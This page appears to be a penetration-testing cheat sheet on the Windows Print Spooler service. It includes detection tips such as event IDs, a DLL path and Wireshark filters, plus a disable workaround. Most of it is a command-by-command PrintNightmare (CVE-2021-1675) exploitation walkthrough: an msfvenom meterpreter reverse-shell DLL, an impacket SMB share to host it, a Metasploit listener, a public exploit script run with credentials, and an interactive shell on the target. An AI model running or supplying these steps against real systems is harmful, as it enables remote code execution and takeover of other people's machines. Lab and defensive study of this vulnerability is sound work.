icon

Windows Print Spooler Service

Last modified: 2024-09-14

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

Investigation

# Check if the Print Spooler service is running
Get-Service -Name Spooler

Detection

Services

  1. Open Services.
  2. We can find the Print Spooler on the Right Pane.
  3. Double-click on it and see the details.

Malicious DLL Location

C:\Windows\System32\spool\drivers\x64\3\

Event Viewer

Open Event Viewer, and find event logs in the following directory in the left pane.
If you want to filter by Event ID, use "Filter Current Log" in the right pane.

  • Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
  • Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
  • Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
  • Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)
  • Windows Logs/System (Event ID: 7031)

Packet Analysis (Wireshark)

Open .pcap file with Wireshark.

Filter packets with "smb" or "smb2".


PrintNightmare (Credential Required)

This is security vulnerability to remote code execution in print spooler service.
It requires authentication (username/password).

1. Check If RPC Endpoints Exist

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

If MS-RPRN and MS-PAR endpoints are found, try the following steps.

2. Create & Host Malicious DLL

We create a malicious DLL for reverse shell.

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

Then host it with SMB server in local machine.

impacket-smbserver share ./share/  -smb2support

3. Start Local Listener

For receiving incoming connection, we need to prepare a listener.

msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

4. Run Exploit

git clone https://github.com/cube0x0/CVE-2021-1675
cd CVE-2021-1675
python3 CVE-2021-1675.py example.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

5. Interact with Target System

Enter the target system via msfconsole.

msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami

Workarounds

# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

References